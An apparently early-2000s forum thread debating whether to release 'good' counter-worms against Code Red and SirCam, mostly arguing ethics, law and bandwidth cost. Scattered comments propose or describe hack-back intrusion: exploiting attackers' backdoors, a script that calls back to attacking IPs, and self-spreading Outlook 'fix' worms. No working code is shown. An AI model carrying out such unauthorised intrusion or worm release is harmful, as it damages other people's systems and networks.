If you're going to try to write a "virus antibody," you had better be good. Otherwise you could accidentally create all kinds of problems. "Ooops! I just accidentally created a DoS attack." If you mess up and the legal authorities track you down, they may not be sympathetic to the "I was only trying to help" argument.
Just something to think about.
** The opinions expressed here are my own, and do not reflect those of my employers - past, present, or future**
I would think you could argue sucessfully that you were covered under the good samaritan law (what is it? go here: What is the good samaritan law?). It is basically the law that says it's ok for you to break into a burning building to help people inside. It also protects you if, for example, you're trying to help an injured person and inadvertantly cause them more harm. Food for thought.
Since the offending party is a) costing you time and money and b) harming the performance of your web server and/or network (also costing you money), I would say he is committing a crime against you. Therefore, you would be well within you rights in proceeding with a Citizen's Arrest against the offending server and remanding it into custody via root access. ;-)
But seriously, do you think it's possible to bring a class action suit against the owners/operators of servers that still haven't downloaded the patch? They are, through their negligence, causing grave economic damage to the rest of us...Anybody out there think you can take a log of all the servers bombing you, do reverse lookups, and file a lawsuit in court? Hehehe...I'm actually surprised no one has tried this yet.
Just thinking out loud...
It's not funny till someone gets hurt.
There is a well-understood concept labeled "the broken window" that says that if you do not repair the cracked windows then eventually your neighbors do not repair their siding, then eventually no one repairs their roof, and eventually the housees become "a sort of rat-place" (thanks to Woody of "Cheers" fame).
This syndrome is often used (correctly) to explain why you cannot let your neighbor do ugly things to their place (like letting the cars rot in the front yard) because the effects move beyond their own property. The effort to stop this slide is sometimes called "community action" (when the speaker likes the objectives) and "vigilanteism" (when the speaker does not like the objectives).
Go figure.
It's understandable in some ways. Say, for example, someone pulled you off the street into their home and shot you. It's your work against theirs that you didn't break in, and you're dead.
I'm the big fish in the big pond bitch.
I'm curious; I've had problems with my DSL router as well. Switching the web admin port to something other than 80 seems to have taken care of it. Any others with a similar experience?
There are lots of people saying 'don't do this, it's not ethical'. The reasoning is clear: to fix a broken machine, you'd effectively have to 'hack' into it, which is bad; there's a chance that you could break something in the process, which is also bad. It's also probably illegal, although the odds are against you being found.
I'm not going to argue that it isn't unethical, but I do think it's still worth exploring the possibilities. Let's assume that CodeRedII isn't the last worm of its kind that we'll see. I find it fairly likely that this sort of attack will be more common, because of the possibilities it presents to hackers.
CodeRedI and II haven't brought the Internet to its knees yet, but the offer the potential for massive denial-of-service attacks that would have the power to do tremendous damage. If script-kiddies start taking advantage of this power, what should we do?
I wouldn't want to start trying to patch these systems myself, but I'd wouldn't complain about any vigilantes doing the job. Furthermore, it's possible that future CodeRed variants will not only attempt to infect other web servers, they'll also attempt to download new instructions from random web servers. If this started happening, I'd have no qualms about providing self-cleaning instructions on my own server.
There has been a major scientific break-in
The approach would not to be to create a white hat worm to infect a computer to fix the hole since that is considered by many to be as unethical as infecting a computer with harmful intent; It would be to just have a script to download the main page from any host that attempted to attack you (after all, they all run web servers). Then the script would search for any e-mail address (ie. webmaster@....) on the main page, probably at the bottom and then send an e-mail to that address informing them that your server was hit by the Code Red Worm [I | II] from their server.
Just an idea...
I'm with you zothorn.
.com's in my area have one admin doing the job of three.
Admins should be responsible for their own
boxes being compromised and have to shoulder the
accompanying humiliation if their own neglectfulness is revealed .
There are too many weekend-crashcourse MCSE's getting hired for
positions demanding seasoned, experienced admins.
I am hopeful that some of the businesses whose
scans turned up in my logs get wise to the fact
that this exploit exists only as a result of
irresponsibility.
...Of course it may also be that so many IT departments get hit first when it's layoff time.
Some
When all you have is a hammer, everything looks like a skull.
This way, the rest of the internet doesn't have to suffer.
I doubt that the person who wrote the counter-virus would get it perfect on the first try, and an "almost ready" virus is a damned scary thing. What kind of excuse would you be able to give for torching a couple thousand web servers by accident?
A good idea? Absolutely not.
Part of the problem with worms isn't just the malicious acts that they perpetrate, it's the bandwidth that they use.
A particularly virulent worm can bring servers and routers to their knees just propagating itself. That's before it even gets the chance to do any of its intended damage. (Remember Melissa, or The Great Internet Worm?)
Add to this very real concern the fact that striking back in this way, no matter the good intentions, is almost certainly illegal, and the whole idea is a definite no-no.
(Yes, it does have a certain appeal - but so do many other things that are bad ideas, too)
Cheers,
Tim
It's official. Most of you are morons.
A K5 user has provided the source to a proposed code-red anti-virus, which actively repairs remote systems infected with the code red virus. The legal implications of this are a bis issue, but it's certainly an interesting code example.
--CTH
--Got Lists? | Top 95 Star Wars Line
here is more info.
So why not ask for their consent? Like this:
(1) User A, who has clue, downloads the patch and fix.
(2) Fix, as a part of the fix, scans his files to determine where infective packets have been sent.
(3) Fix requests: "Send this fix package to those who have been infected? y/n"
(4) If yes, fix zaps to chosen people. (Email, ftp, whatever.)
(5) Email says to clueless user B, "I have been sent by such-and-such because his computer indicated that you were attacked and/or infected by $INFECTIVE_PROGRAM."
(6) Fix says, "My authenticity can be verified by going to website blah-blah-blah, and downloading X program." Or perhaps there is no attachment to the email, and it links you to the website to download the fix.
(7) User B, now clued, downloads the fix and runs it. Process iterates.
Unless the box is moldering in a closet somewhere and hasn't been touched in months, this system should get through to all infected users eventually. And best of all, it's TOTALLY VOLUNTARY on each and every user's part.
Comments?
Your friendly neighborhood nitpicker
@Home/Mediaone has blackholed all incoming traffic on port 80. Go figure.
It's still a bad idea in so many ways, but that'd just be a redundant rant.
Easy does it!
This comment has been submitted already, 276865 hours , 59 minutes ago. No need to try again.
What about one that rings the doorbell just to tell you that your door is open?
And after closing the hole, the counter-virus should stay resident and launch a counter-attack against anyone who tries to exploit the hole..
Dude, we already have those, and they're called anti-virus software with gatekeeping features.
The problem is that the person with a rooted server now is someone who doesn't know what's going on. They don't know what they're running, they don't know they're running IIS they don't know that they're running the indexing server, something. This person is also likely to have other services that may be rooted. Patch this one secretly and they'll never know. The best suggestion I've seen is collect firewall logs and send mail to the webmaster. This won't work for all cases because a bunch of people will have a web server and not a mail server.
Please, please, PLEASE, learn your proper English plurals.
There's no reason to be making up words.
-------
"Every artist is a cannibal, every poet is a thief."
When I receive a bogus virus warning from my friends (e.g. Good Times), I reply:
- Check urbanlegends.about.com to see if it is a hoax before forwarding an email.
- Proper virus warnings show up as articles on CNN, or companywide notices sent by your company's IT administrator. If it didn't come from either of these two sources, ignore it.
This is my own attempt to educate the user population. However, virus spam messages seem to be much better at educating the population than my replies.So what would happen if I wrote a serious message with a real warning (e.g. "Anything with a .VBS extension is a virus.") and said, "Forward this on to everyone you know?"
P.S. Based on my understanding of privacy laws, it's legal to encourage people to forward messages to their friends, as long as you aren't collecting information about them.
The last guy that wrote a "repair" worm was not jailed for writing the worm. He was jailed for wrting a worm that left a back door. If we released a worm that patches, propogates, and erases itself without installing back doors, is THAT legal? The last guy that tried this was arrested because his worm installed a back door. A pure "fix-it" worm should have no detractors. Now here's a good application: create an MS Outlook virus that completely disables extension execution, runnable scripts, and all those other nasty security holes in outlook. Send it out as a porn email and watch it spread like mad. A few "waves" of these and we will have fewer and fewer outlook viruses. Remember, the way to control a virus is to make it more difficult to reporduce. If we lower the production rate for these outlook viruses by releasing a countervirus, production of infected emails could be reduced greatly. And I wouldn't have to delete fifty sircam viruses from my email box every time I checked it.
I suspect we wouldn't be impressed!
And would be talking about what backdoors they may be installing on our machines...
Which is excellent justification for killing him, burying the body in some remote location, cleaning up the mess, and denying everything. ;)
Meldroc, Waster of Electrons
It seems to me that everyone has a problem with distributing another "worm" and damaging the infected system. Why not take this approch: First, write an apache module that would use the original exploit the gain access to any system that attacks the "defending server". Second, once the attacking system has been accessed simply disable the TCP/IP stack (no permanent damage). This would result in the attacking system being shut down until an administrator could repair the system (or even be made aware of the problem for that matter). And because the module would have to be installed on a server you would not have to deal with another worm running around unchecked.
If someone leaves thier lights on in the parking lot do you open the car door and turn them off? A Better analogy is you Walk in the front door of someone who went on vacation and lock the door for them... Cy
well come on, don't just tell us it exists... tell us where! ;)
SSL Certificate
I unfortunately do not have a link, but I know this was actually discussed as a solution by these organizations, and the idea was thrown out. However, if a "white hat" hacker were to do this, I think many sysadmin type people would all let out a collective sigh. -k
Amen!
My biggest paranoia would be that I'd write it so it would go out of control, then I'd be the one they'd be hauling out of the police car and into the courthouse on CNN.
And I can't honestly think that I'm the only one that ever thought of this.
Has anyone else heard of/attempted/got in trouble for fighting fire with fire in this way?
I've played with this idea before as well but the one thing that I always thought that this seems like it would be equivalent to breaking into someones house and then fixing the way you came in. It's still breaking in, regardless. Kind of a "white hat" hacker deal but that still is considered a "no no" in the eyes of the law.
You're still infecting them with a virus, it's just a good virus and you could probably be brought up on charges under some computer crime legislation.
I think there was a virus a long time ago whose only purpose was to kill another virus, i dont remember if it was on the Amiga or on the PC. Anyway still it ended up being classified as a virus. To be honest i prefer to have control over my anti-virus program rather than have core wars games running on my pc without my control :)
Why not take the Symantec Sircam cleanup utility, patch it to make it self-propagating, and then e-mail it out with the message "Hi there! I send you this because you're a stupid fscking idiot. :)"
Got Rhinos?
Unfortunately, the general consensus is that the proper remedy for this worm is to reformat and reinstall on an infected machine. And while the idea of reformatting the drives of all those idiots who got themselves infect and are probing my machine is very appealing, it's also potentially very illegal.
I would be in favor of half-measures, like a script that would patch the IIS vulnerability, and clear out the root.exe and explorer.exe vulnerabilities, but this may be ultimately harmful, since it may not remove all vulnerabilities AND it may make detection of the exploit more difficult for the machine owner.
Does anyone have any ideas in light of these problems?
Also, it opens the door for a whole new wave of confusion. Suppose I tweak the "good" virus, and add a little bit of insidious behavior? What if I send out a "bad" virus claiming it is a "good" one?
Right now, we're fighting a losing battle to get users to STOP clicking on unknown attachments. Any progress we do make would be COMPLETELY destroyed by encouraging them to install "good" virii. Right now, the optimal virus protection might be a grammar checker. You'd think that the guys who wrote Zero Wing had found a new hobby.
Seen any BadMarketing lately?
Personally, I feel a virus is a virus, regardless if your intentions were good. You're not any better than the hundreds of losers out there creating this mess. If you want to warn me of security holes in my system, send me an e-mail that doesn't contain a virus.
there are no stupid questions, but there are a lot of inquisitive idiots
Why not have another virus that exploited the back door, closed it, then started sending itself to other servers for a certain period of time?
Sending to other servers for a certain period of time is not a good thing. First of all, you are causing harm by checking those other systems. Secondly, you are causing harm on the machine you install this on. Thirdly, you might screw it up, and accidently cause even more harm than you intended.
I don't have a problem with exploiting the back door and closing it for any site which specifically tries to infect you, but after that your interaction with the other server should stop. Even that has the problem of possibly not letting the victim know about the problem, and that in itself is troublesome.
ok then your [sic] infringing on my copyright! Could you as [sic] me next time before STEALING my comments for your own?
I agree. This past monday when i first login, my W2K told me it shut down in 2 minutes because it just installed an anti-code-red. this is itself exactly a virus: executing something without owner's consent...
If you're going to spout anti-MS rhetoric, at least have something constructive to say...
"The submittor raises an interesting question - is this possible?"
Hemos: now read this out loud to yourself in the voice of Marvin the Martian.
N.B. It is spelt 'submeter'.
~Iain
There have been "good worms" released on the Internet before that had bad bugs. I wouldn't want the FBI knocking on my door and taking all my computers when something went wrong.
Leaving your box open harms me if it's used to attack me. This sounds like the smoker's argument that they should be able to smoke wherever they want. Of course, society is increasingly disagreeing with that argument.
Of course the other point I think that needs to be made, is that I believe the majority of those people don't WANT their boxen to be open. That's why they call it exploited. I don't think it's their choice. I don't believe negligence, by definition, is a choice. Personally, I would chalk lack of patching up to lack of foresight (it's a little gentler than stupid).
The perception of reality is more important than reality itself.
It has been done before, not on the net but on the Amiga. It was a antivirussoftware that hade viruslike effect. It spread it self and killed of viruses at the same time.
There have been (at least) three Code Red related stories on slashdot and this very possibility has been discussed every time. In multiple threads.
A good reason to live in South Carolina. The Attorney General recently announced "Open Season" on home invaders. If someone breaks into your house, he says, shoot them dead. He has specifically instructed all prosecutors in the state to *NOT* charge anyone with shooting a home invader.
"I was a geek before it was cool" --Me
- The morality aspect - you are "taking control" of someone elses hardware/software
- The legal aspect - this still constitutes "cracking" as you have illegally gained access to a computer system that is not yours. Breaking into someones house is not OK just because you only intended to do their dishes.
- The practical aspect - the worst side effect of internet worms is not primarily damage done to the infected systems, but bandwidth consumed and resources depleted as a result of the worm spreading.
I don't know of any real-life implementations of this (I somehow have the feeling I have heard of it, but it escapes me right now), but the concept has been debated at length during prior "worm attacks". There are probably many other reasons why this is not a good idea, but I think these are the most signifficant.^]:wq!^M
I'm quite sure, that any anti-worm will be in no time countered by a new version of the original worm, which is (a) imune to your anti-worm, and (b) killing all your anti-worms it meets...
Will make quite a big digital war, between those worms and their counterparts...
Virus writing in the real world is an abhorent practice, though I'd be suprized if anonymous groups don't start "tagging" machines, battling back and forth with the exchange of virii/worms to claim the world.
I don't see how it could be a problem, I mean, logically only something like a DoS attack or the like can't be "undone". If it's a bug in the individual system then it should be able to be fixed. The problem arises with the media stigma of a virus.
Now this just goes right back to the whole "but I thought a virus was bad" response that your typical user will tell you. For the most part, it could work wonderfully, but the big thing is, the only people who will need it are those who did not patch a system for the bug (since if they patched it, then the retrovirus (if you will) will not be able to use the same vulnerablilty). Those are most often the same people that opened 40 SirCam attachments even though they were warned ("But it came from my best friend!"). To these people, a virus is something to be afraid of, regardless of purpose. A virus is always a bad thing that will "break the computer" and we don't want to "break the computer" because we can't "fix the computer" <Cue ominous music>
But then again, if these people are so oblivious as to how they're infected, then it just may work as long as the media doesn't blow it out of proportion again.
- Relativistic? That's barely Newtonian!
It's not the "good" admins causing the problem, it's all the "default" IIS installs at peoples' houses with no firewall between them and their cable modem.
(By the use of "good" in describing a MS admin I only intend it as releative to other MS admins)
If you are in a dark alley somewhere, and there is one other person, and he draws a gun on you, indicates an intent to harm you, you have the right to use your weapon ONLY IF that is your last resort.
Actually, that's not true, at least in Virginia. There is little to no notion in American law requiring evasion on the part of the atackee. Virginia law reflects this allowing you to shoot before you run. In fact, you can respond with deadly force anytime your life is genuinely threatened (ie, not a little old lady beating you with a stick but a 6'4" giant beating you with a baseball bat). Most places in the US are the same way.
You are correct that there is no civil concept of self-defense. Those suggesting that a direct invasive response is anywhere close to appropriate as a response to a virus is kidding themselves.
It kinda boils down to: Do you want ANY unknown software running around on your system, even if it's intentions are good. I think that if I had the choice of allowing "good" viruses on my system, I would decline. Maybe a worm that finds/exploits a weakness in your system could just leave a calling-card text file somewhere to alert you to the issue. It reminds me of the old cartoon where they bring in a cat to chase away the mouse, then they have to bring a dog to chase away the cat, etc., etc., etc.
Break into my house, you die.
Throw away my coffee, you die slowly.
:)
If you were me, you'd be good lookin'. - six string samurai
There was a misguided case in MA that tried to establish a precedent of required flight from the home, but that was a) related to a domestic abuse situation and the assailant was also a resident of the house, and b) has since been clarified in MA state law by the legislature.
And no, I'm not a lawyer, just an LFI graduate.
I'm not from the US, so I'm curious. You think the right to bear arms is the equivalent to the right to gun somebody down because they tresspass on your property?
I think killing somebody is a little extreme as a punishment for a bit of burglary.
All I want is a secure system where it's easy to do anything I want. Is that too much to ask ~~ Randall Munroe
Is this part of the problem?
I have a friend who works for a company that's doing just this. They are funded by the government to write intelligent agents ("agents" in the sense of mobile code) for security purposes. So rather than merely setting up a firewall, the goal of this is to write software that can move from machine to machine, like a virus, and stomp out viruses, trojans, and fight off other attackers.
Call it a white blood cell.
So is developing a counter-virus, an antibody, a white blood cell being part of the problem? I don't think so. Once a computer's been hacked, it's already been hacked. It's already been violated. If you don't want people to write counter-viruses, for heaven's sake, don't let you computer get infected in the first place! Viruses are preventable.
Actually...you CAN'T shoot someone for merely trespassing or breaking into your hime. Legally, they must pose a threat to you, family, etc in the house. If they pull a knife(for example) in your house, you can let them enjoy a hot lead injection though.
-Henry
Not a lawyer, but took a year of law in high school...
"Useless organic meatbag" -HK-47
You'll find plenty of cases where a criminal harmed by a victim who was protecting himself has successfully sued for damages.
I'm the big fish in the big pond bitch.
I've always considered Windows Update the anti-virus virus.
http://language.perl.com/misc/virus.html
I forget the actual virus names, but years ago a virus appeared to try and do just that. Unfortunatly it had a bug, and became more prevelent and destructive than the virus it was trying to remove!
Although this is probably an urban legend, I have been told of someone to whom SirCam emailed Windows XP RC1. So yes it is theoretically possbile ;)
Although the current method of anti virus software is not perfect, because people not having the software or updated virus definitions, it's currently the best way, and there are definitely improvements to be made in the field.
-crombie
What? I don't know about you, but I keep my doors locked. No one is going to come randomly "wandering in." If there in it's because they were determined to get in, for whatever reason.
Your post makes no sense.
On my server I have a shell script run by the webserver which echos the REMOTE_ADDR variable along with the current time into /tmp/cripfifo (Code Red IP FIFO). From there I have a script that I run as another user that does and endless loop of cat /tmp/cripfifo | while read i which then loops and for each line it inputs (which is actually probably only 1 since the fifo is closed each time the webserver script writes into it). With each line of input it first checks to see if there is a file named $REMOTE_ADDR* in the errorips directory. If not it runs another script in the background which uses wget redirecting output into errorips/${REMOTE_ADDR}_TIME. If it succeeds it moves that file into the processed/ directory which means that if the machine attacks again it will repeat this processes each time it attacks.
Yeah, I know there are some race conditions if the same IP gets processed before the other one has had a chance to write the logfile. It's not a big deal though, and the chances of that happening are slim anyway unless someone is just bombarding you with attacks in which case it still doesn't matter.
See http://kernelrpm.sourceforge.net/codered/ for the scripts. Note, it may be a better idea to use the Location directive for /default.ida and point it to the script rather than making the whole damn directory ExecCGI. Although I don't have a problem doing that since only I have access to it anyway.
In an earlier slashdot article (http://slashdot.org/articles/01/01/18/0141232_F.s html) a text was mentioned that describes the early WANK worms, and, at the least, implies that a worm killing worm has (successfully) implemented, and was (I think) only the third worm ever widely released (preceeded by father christmas and the first WANK worm...).
Anyway, here's a snippet from the text: "It was also designed to hunt down and kill the decoy-duck program. In fact, the SPAN network was going to turn into a rather bloody battlefield. This worm didn't just kill the decoy, it also killed any other copy of the WANK worm. "
However, there's another (imo more significant) implication to consider. The intense global network traffic caused by spread of Code Red practically brought the Internet to its knees for a couple days due to the sheer magnitude of data travelling over the wires. Worms double effectively as DoS attacks even when not attempting to. Now, as bad as the Code Red infestation hammered the internet, releasing an equivalent White Hat worm could significantly _increase_ the amount of traffic out there. Put enough worms out there, good OR evil, and you'll eventually get to the point where the whole damn internet is DoS'ed.
Magius_AR
More like locking a house which you see isn't locked. Cops have been known to rattle doorknobs.
Clue: threatening someone with deadly force and cracking their webserver are not even remotely of the same magnitude.
Yes, but criminal trespass (a crime to which an American citzen can respond with deadly force) and cracking a webserver are of the same magnitude.
I own a very large store - and I had the building designed and built by one of the most well known store building contractors in the world.
Its a huge store - I employ many many people, and we sell a lot of stuff... but in the past 5 years that I have been in business I have had several break-ins where people keep stealing all my stuff - of just trash the place and destroy all our merchandise so that we are out of business for a time.
I ahve contacted the police and they have investigated and determined that the building was designed with doos, windows and locks that can be opened by people who know how they work without having to have a key. Everytime I get robbed or trashed the contractor comes out and fixes the locks or doors or windows, but it happens too often. I cant replace the building with one that is made by a different contractor because that would be too expensive - I would have to train my staff again, and teach them where everything is located because that contractor cant build a store that is of the same configuration...
so I am stuck with the building I ahve - and these vandals and theives keep finding ways of breaking into the building that I own - well I dont really *own* it I am leasing it from the contractor - but apparently even though the contractor owns it - they apparently have no legal responsibility for the property.
I have been told that I cannot sue the contractor for providing me a building that has design flaws which allow breakins which cause my business to be unable to accept customers and make money - because I apparently agreed to their lease terms.
***
And microsoft laughs all the way to the bank.
We should start a class action suit to get MS to adhere to the license policy - seeing as how they OWN the software we RENT from them - it is THEIR responsibility to fix the fscking leaking faucets.
If my house burns down because of a flaw on the designer or landlords part I sue the pants off em.
lets get M$ to be responsible gor gods sake and stop bitching about whether or not the fscking design of white-hats is ethical. we keep focusing on the symptoms and not the root cause. FAULTY SOFTWARE IS RESPONSIBLE - not the damn virii.
Sort-of. You are allowed various self-help remedies under certain circumstances.
Also, you *do not* need the police under many sets of circumstances. You can obtain court orders in the civil context that allow you access to seize the property of others (although you may need the Sheriff or US Marshal to preserve the peace or execute the court order).
Also, the police have exeactly the same rights as other citizens to use reasonable force, up to and including deadly physical force. They may use it to protect themselves or others from imminent danger. The practical side, though, is that--cop or no cop--if you use deadly physical force you'd better be right, or your butt is toast. Cops might get more of a benefit of this doubt on this as a practical matter, because we entrust this function to them. (There are also rules regarding the arrest aspect of physical force, but I'm talking here about the self-defense aspect.)
My second scenario is like a trespass analogy (and as I said, is likely illegal as I phrased it). Trespass is jusitified under many circumstances.
You are right, though--with regard to physical force or other intrusions upon the person or property of others, you must generally stop once the exegency is over and resort to the cops or the courts before you go further. Remeber, even the cops will need the power of the court under most circumstances (search warrant, arrest warrant, etc.) just like an individual (writ of replevin, forcible entry and detainer (for evicitions), seizure of evidence for a civil matter, and so on).
Remember the DirectTV anti-hack on the hackers? Seems like this is the same idea. Anti-virus the virus...
Hey, if it worked for DirectTV, it should work here...
Actually, this may start a "best of the best" competition with virus writers. They'll come back with a virus to counteract the anti-virus, and on and on.... might be interesting...
Good quote, too many chars. Seriously, the slashdot 120 char limit sucks!
See this link for examle.
Clue: threatening someone with deadly force and cracking their webserver are not even remotely of the same magnitude.
A while back there was a vicious little bugger going around called the Autostart worm, it was evil. It made its way onto CD's and across networked macs. While this was happening MacAddict released a CD and it was infected. but curiously enough, it was a good worm. (i wonder how it got there!) Said worm would Infect your machine and spread like the others, but the main differnce was it would remove other autostart worms and destroy it self after Christmas day.
check out http://www.cknow.com/vtutor/vtplural.htm for more information...
(rant mode off)
- In Capitalist America, law violates YOU!
So now you have a bunch of viruses, and counter-viruses roaming the net. This is not so bad until you have self-mutating viruses and antigens, several generations down the line. Eventually chaos theory will dictate that the nature of the relationship has become so complex as to be unknowable. This is a pandoras box we don't want to open. It's similar to the human cloning issue, in that there are a lot of good arguments not to do it, but there's one overwhelming argument for making it legal, lincensed and monitored; that is, if it's not legal, those who choose to pursue it will not be hindered in that activity, but will be forced to pursue it without oversight, while in hiding and possible in poorly controlled conditions.
All you can do here is appeal to the logic of those who would pursue such an activity and suggest that they not undertake it, but regardless of how much you argue, convince and suggest, someone will eventually do it and there will be severe concequences - not all negative, but severe, with respect to how we look at technology and how we use it.
It could further be argued that those against such undertakings, need to ajust to changing technology and make the appropriate changes to their world view. This is what the recording industry is having to do, as well as companies in other well established industries. The same will eventually be true of how we look at software design (computer viruses), and biology (human cloning).
--CTH
--Got Lists? | Top 95 Star Wars Line
A patch can do the samething w. less potential of harming the user's machine. If they just got off their lazy asses and dl'ed it instead of waiting for someone else to do it to them.
This only shows how words like "worm" and "virus" are inadequate metaphors already stretched to the breaking point. The fact is that a worm or a virus or any other piece of software is not a separate entity that "goes out and does something" -- it is you. If you write a worm that is meant to propagate through the net and alter something on other people's property, it's you that is doing all the damage, not the worm. Any computer program is just a cybernetic extension of your own limited capabilities to make decisions and take actions.
Vigilantism is generally considered to be an enemy of a civil society. You have no more right to trespass onto other people's property to battle a worm-writer than the worm-writer has the right to do the initial trespassing. The implicit agreement among system administrators across the net that hacking to find security holes is an acceptable and beneficial exercise is long gone, ever since the net became a commercial field. A commercial field has a different structure of trust, one in which vigilantism can play no part.
The last guy that tried that went to jail. I wish we could. I could fix code red in two hours.
I've been wondering why this worm doesn't exist: It sends itself to everyone in your email list It disables outlook running .vbs, .com, .pif, and .exe attachments
It disables .vbs files for the whole system
If you think education is expensive, you should try ignorance -- Derek Bok, president of Harvard
i live to see the world, be there for my family, and be who i am, but the governement and monopolies sure are good at fudging things up.
Any time anyone says or writes "virii" you know you're dealing with someone who'd rather appear clever than correct.
Let's also drop the insane analogies comparing this to someone threatening a family member's life. It's just a bunch of computers.
from the bugtraq post:
To: BugTraq
Subject: Infection Notification
Date: Sun Aug 05 2001 10:50:22
Author:
Message-ID:
If you'd like to help us notify users they are infected please send offending IP data to aris-report@securityfocus.com. Please use the following format:
IP ADDRESS DATE/TIME WITH TIMEZONE
Or something similar to this. Please ensure the information is constrained to IP address and date per line as we do our notification automatically and our systems need to be able to understand the data you send us.
--
Elias Levy
SecurityFocus.com
http://www.securityfocus.com/
Si vis pacem, para bellum
---end bugtraq post---
-f
www.blackant.net
Anybody think about the bandwidth implications of this? We'll have anti-viruses counteracting viruses, viruses counteracting the anti-viruses, etc. This will all eat up bandwidth just as bad as Sircam and Code Red have.
while I do agree it is there own fault for picking such a useless product, the idea of fighting fire with fire is an interesting one. but who would want to tread the thin line and do it.
why would symantic or network associates want to do it. there would be less reason for people to buy there products. if a "whitehat hacker" (I hate that term) decided to make the anti virus we can guess that the fbi would be sent down to beat down his / her door because obviously he / she is a hacker who must be stoped
**** lying is wrong even for sleeping dogs
Why not let the sysadmins who chose to use IIS keep up with the latest security patches and such? There was so much hype surrounding Code Red that no one should have been severly affected by it. Surely if your sysadmin is worth his salary he will keep up with the latest news... I'm not saying that he/she know every security hole and exploit out there, but they should try to keep track of the big ones at least
That's just my $0.02
I keep seeing people talk about how invading a server in some cases is legal, because "the intent was good". That is an incorrect interpretation of the word intent. Intent only refers to the crime itself, i.e. did the criminal intend to break-and-enter or was it accidental.
This means that unauthorized access in the attempt to do a "good deed" is just as illegal as black-hat unauthorized access.
For this to happen, someone with the antidote virus would have to break the law to spread it and apply it. Of course, Robin Hood was considered a criminal too.
Here is my throw at the metaphor stakes... Its like someone comes to your home and breaks you coffee maker, then finds the address of all your friends and visits them, if they have a jar of 'Outlook Expresso' in the kitchen, then they break that coffee maker. Now awear that this person has visited your house you become enraged enough to set out for revenge. You start by visiting all you friends and try to fix their coffee makers (even if their not broken) and then move on to visit their friends. Now the question is... which note do you leave on the kitchen table. a) a note saying a) Hay Joe I fixed your coffee machine b) Hay joe I fixed your coffee machine, sorry for breaking it in the first place c) Hay Joe you owe me $40 for the visit I like the E-Ambulance chasing option.
Imho, retroviruses are an elegant solution to a serious problem. Though they only stop a single type of virus (whereas education can help stop ALL viruses), they're a powerful tool.
I will dance for joy the first day I see an easy-to-use anti-virus creator package, to combat the virus writer packages out there.
I just took a sample of the addresses in my access_log over the past hour. At least 50% of them don't respond. Most of the one's that do don't respond to root.exe (some did so I know I did it correctly)
Seems to me like someone is already taking matters into his/her own hands...
Once you do this, you are changing THEIR computers. And you might be a known entity. And their lawyers will be all over you. It is the same whether the system is infected or vulnerable. You are changing what belongs to somebody else. And that puts you in the same position as the author(s) of the CRs.
Yeah, where is this script! This would make me a very happy man and it would certainly help reduce the load on my poor linux machine that is being hammered by those damn Win boxes! In a weeks time, I have received over 2800 attacks and I'm not even a large corporation just a cable user. This is ridiculous!
Could not something like this be done at an ISP level? With simple monitoring finding an infected machine could be done quickly, then the machine is removed from the network or it's outbound traffic is disabled while either the ISP calls the client or an automatic email is sent telling them of the problem? It's not a virus at all so it would be legal, and the only downside would be a temporary loss of service until the sysadmin of the infected machine gets off his ass and downloads the patch thats been blasted on the tv/paper/radio for the last 2 weeks. People may complain that denying inet service to them because their machine is infected is a bad idea, but in a sense they are as bad as the virus creater themselves when they knowingly continue to let a machine run thats spreading a potentially very evil bug to spread.
At my place of employment we're constantly receiving email based virus attacks from people that insist on running Outlook. We've jokingly came up with what we called the Update worm. The spec for this would be to detect if the user is using the virus spreading outlook, then download the free version of Eudora. Once that was accomplished it would transfer all the mail over to the Eudora format, then change all the desktop links, etc to point at Eudora instead of outlook. Then - remove Outlook!
Only a joke mind you - never implemented!
Have you compiled your kernel today??
If my memory serves there has been a "good" worm set loose to fix problems caused by a "bad" worm. Here is the slashdot article on it.
Seriously, folks, everybody who *could* write something like that either (a) recognizes that infecting someone's box is infecting someone's box, closing holes or not or (b) sees no problems in having the rooted boxen out there anyway. I doubt that anybody else actually has the skills to do it.
not
BTW has anyone seen my zig zag?
At work, we had a Lotus Domino server that would crash whenever someone requested an non-existant Web URL from it (don't ask...). As most access to it are done from programs, or from links & bookmarks, this hasn't actually been a problem until recently...
Since the beginning of August it started crashing every hour or so, making it rather difficult to work with. Then, this week it crashed every ten minutes... Initially we assumed that unknowingly a coworker was mistyping an URL, or doing some bizarre tests which crashed it. Then we understood what was really happening: it was CODE RED! Does that qualify as client having downtime due to Code Red?
However, in retrospect, this whole story had a good thing to it: it encouraged the guy in charge of Notes to find out why exactly it was crashing when asked for a non-existing URL... And he did indeed find the faulty config option and fixed it.
Ok, now on the next task: another of our Domino servers crashes whenever somebody enters a bad password into the HTTP password dialog box for protected pages (yeah, yeah, I know...). Now that the weekend is approaching, and the kiddies are putting their final touches onto their new creations, could somebody please include an Authorization: Basic Tm90ZXM6c3V4b3Jz0 into the HTTP headers of the probes of his Code Red III, so that we have an excuse to fix that problem too? ;-)
Say no to software patents.
Why not let the sysadmins who chose to use IIS keep up with the latest security patches and such?
They aren't the ones with the problem:
The problem is that 'self defense' only exists in a situation where your personal safety is at risk - like the above scenario.
It's like asking: If someone is breaking into your house to use your coffee maker, are you allowed to kick down their door and throw away all their coffee?
Basically, you can't violate someone else's rights unless your own safety is in danger.
Now he can just walk right in with his own gun, steal what ever he like, rape the wife, all without a fear of being shot killed.
The journey is better then the end.
That seems a bit like overkill. There is an Everything2 node on this subject with some simpler PHP code samples, including (full disclosure) one by me.
This sounds like a fun passive attack, but how well would it stand up if you were sued? Sure, if you put up a script on your site to clean servers that's completely legal, but when you go out of your way to rename it in a way that will trigger it when a server tries to attack you that could be seen as an intentional attack (no better than going through your logs and manually cleaning each IP). btw, can anyone point me to one of these scripts? :)
They that quote Benjamin Franklin on liberty and safety deserve neither.
Look, the people who are infected are too dumb to look after something as critical as a web server. The reason they got in trouble was because they were too dumb to keep up with patches. Don't go and do their work for them, or they will never learn.
What is the best way to learn? With a parent blasting you for a huge bandwidth bill. For your boss firing you for letting the company's database get owned. Having customers ripping you to shreds for destroying something important.
Not until they realise the severity of their actions will they begin to learn. Let them stew in their own "security patch" juices for a bit, and when they are done, pull them out and point them at alternatives.
As someone said before, otherwise you will hear conversations like this:
Of course, the author can't go around claiming responsability (or posting stories on slashdot), that's not cool.
--
Stay tuned for some shock and awe coming right up after this messages!
